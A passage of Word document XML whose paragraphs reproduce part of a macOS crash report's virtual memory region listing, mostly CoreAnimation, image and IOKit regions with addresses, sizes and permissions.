        <w:t xml:space="preserve">CoreAnimation          0000000110af5000-0000000110b33000 [  248K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000110b3e000-0000000110b7c000 [  248K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000110b88000-0000000110c04000 [  496K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000110c1a000-0000000110c59000 [  252K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000110c5a000-0000000110c5e000 [   16K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">CoreAnimation          0000000110c60000-0000000110c64000 [   16K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000110c68000-0000000110c6c000 [   16K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000110ce4000-0000000110ce8000 [   16K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000110d13000-0000000110d58000 [  276K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000110d5a000-0000000110d98000 [  248K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000110dab000-0000000110dfd000 [  328K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000110e08000-0000000110e24000 [  112K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000110e34000-0000000110e7a000 [  280K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000110e85000-0000000110ec3000 [  248K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000110ed7000-0000000110ef3000 [  112K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreUI image data      0000000110ef3000-0000000110f1a000 [  156K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000110f1a000-0000000110f6f000 [  340K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreUI image data      0000000110f70000-0000000110f8e000 [  120K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000110faf000-0000000111036000 [  540K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000111041000-0000000111051000 [   64K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               0000000111055000-0000000111056000 [    4K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">IOKit                  0000000111056000-0000000111057000 [    4K] rw-/rw- SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               0000000111059000-000000011105b000 [    8K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">IOKit                  000000011105b000-000000011105c000 [    4K] rw-/rw- SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               000000011105c000-0000000111063000 [   28K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">IOKit                  0000000111064000-0000000111065000 [    4K] rw-/rw- SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000111065000-00000001110a3000 [  248K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          00000001110ae000-00000001110b6000 [   32K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          00000001110ba000-00000001110be000 [   16K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               00000001110c1000-00000001110c2000 [    4K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          00000001110c2000-00000001110c6000 [   16K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               00000001110c6000-00000001110c9000 [   12K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">IOKit                  00000001110c9000-00000001110ca000 [    4K] rw-/rw- SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          00000001110d2000-00000001110e2000 [   64K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               00000001110e3000-00000001110e5000 [    8K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">IOKit                  00000001110e5000-00000001110e6000 [    4K] rw-/rw- SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">CoreAnimation          00000001110e6000-0000000111162000 [  496K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000111178000-00000001111dd000 [  404K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          00000001111df000-00000001111e3000 [   16K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          00000001111e7000-0000000111225000 [  248K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000111230000-000000011124c000 [  112K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000011125b000-000000011126b000 [   64K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000111293000-000000011129b000 [   32K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000111341000-000000011137f000 [  248K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000011138a000-00000001113c8000 [  248K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          00000001113d3000-000000011144f000 [  496K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000011146d000-0000000111471000 [   16K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000111485000-00000001114a9000 [  144K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00000001114ac000-00000001114ad000 [    4K] rw-/rwx SM=COW  /System/Library/Filesystems/NetFSPlugins/ftp.bundle/Contents/MacOS/ftp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          00000001114b1000-00000001114b9000 [   32K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          00000001114bc000-00000001114fa000 [  248K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">CoreAnimation          0000000111515000-0000000111519000 [   16K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000011152d000-0000000111531000 [   16K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000111582000-0000000111586000 [   16K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000011158e000-0000000111592000 [   16K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000011159a000-00000001115dc000 [  264K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          00000001115e7000-0000000111625000 [  248K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000111638000-000000011163c000 [   16K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000111644000-0000000111648000 [   16K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">MALLOC_LARGE_REUSABLE  0000000111656000-000000011168b000 [  212K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          00000001116d4000-0000000111712000 [  248K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000011171d000-0000000111766000 [  292K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">MALLOC_LARGE_REUSABLE  000000011178b000-00000001117c1000 [  216K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          00000001117c1000-00000001117ff000 [  248K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000011180a000-0000000111848000 [  248K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000011185e000-0000000111a85000 [ 2204K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">CoreUI image data      0000000111a85000-0000000111aae000 [  164K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000111b1a000-0000000111b67000 [  308K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000111b81000-0000000111b85000 [   16K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000111b86000-0000000111c0e000 [  544K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000111c2c000-0000000111c3c000 [   64K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000111c3e000-0000000111c4a000 [   48K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000111c4c000-0000000111c7a000 [  184K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000111ce1000-0000000111d1f000 [  248K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000111d55000-0000000111d6d000 [   96K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000111d6f000-0000000111def000 [  512K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000111e22000-0000000111e42000 [  128K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000111e45000-0000000111ed0000 [  556K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000111edb000-0000000111f24000 [  292K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000111f46000-0000000111fa0000 [  360K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000111fab000-0000000111fe9000 [  248K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">CoreAnimation          0000000111ff6000-0000000112072000 [  496K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000011208a000-0000000112112000 [  544K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000112128000-00000001121a4000 [  496K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          00000001121bd000-00000001121fb000 [  248K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000112206000-0000000112250000 [  296K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>mapped file            00000001123a4000-00000001123c8000 [  144K] rw-/rwx SM=COW  ...ry/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/Resources/HIToolbox.rsrc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>mapped file            00000001123c8000-0000000112440000 [  480K] rw-/rwx SM=COW  ...Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/Resources/English.lproj/Localized.rsrc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">Accelerate framework   0000000112459000-0000000112479000 [  128K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000112479000-0000000112500000 [  540K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000011250b000-0000000112523000 [   96K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000112551000-00000001125ba000 [  420K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">MALLOC_LARGE (empty)   00000001125bd000-00000001125e5000 [  160K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          00000001125e5000-0000000112623000 [  248K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000011262e000-000000011266c000 [  248K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">CoreAnimation          0000000112678000-000000011277b000 [ 1036K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000011279c000-00000001127da000 [  248K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          00000001127e7000-00000001128a5000 [  760K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          00000001128c6000-0000000112904000 [  248K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000112917000-0000000112927000 [   64K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000112928000-00000001129af000 [  540K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          00000001129e6000-0000000112a30000 [  296K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000112a3b000-0000000112b63000 [ 1184K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000112b84000-0000000112bce000 [  296K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000112bd9000-0000000112c55000 [  496K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000112c6d000-0000000112d05000 [  608K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000112d20000-0000000112daf000 [  572K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000112dba000-0000000112df8000 [  248K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000112e06000-0000000112e44000 [  248K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000112e4f000-0000000112ecd000 [  504K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">CoreUI image data      0000000112ecd000-0000000112ef6000 [  164K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000112f22000-0000000112f64000 [  264K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000112f71000-0000000112f79000 [   32K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">MALLOC_LARGE (empty)   0000000112f7b000-0000000112fef000 [  464K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
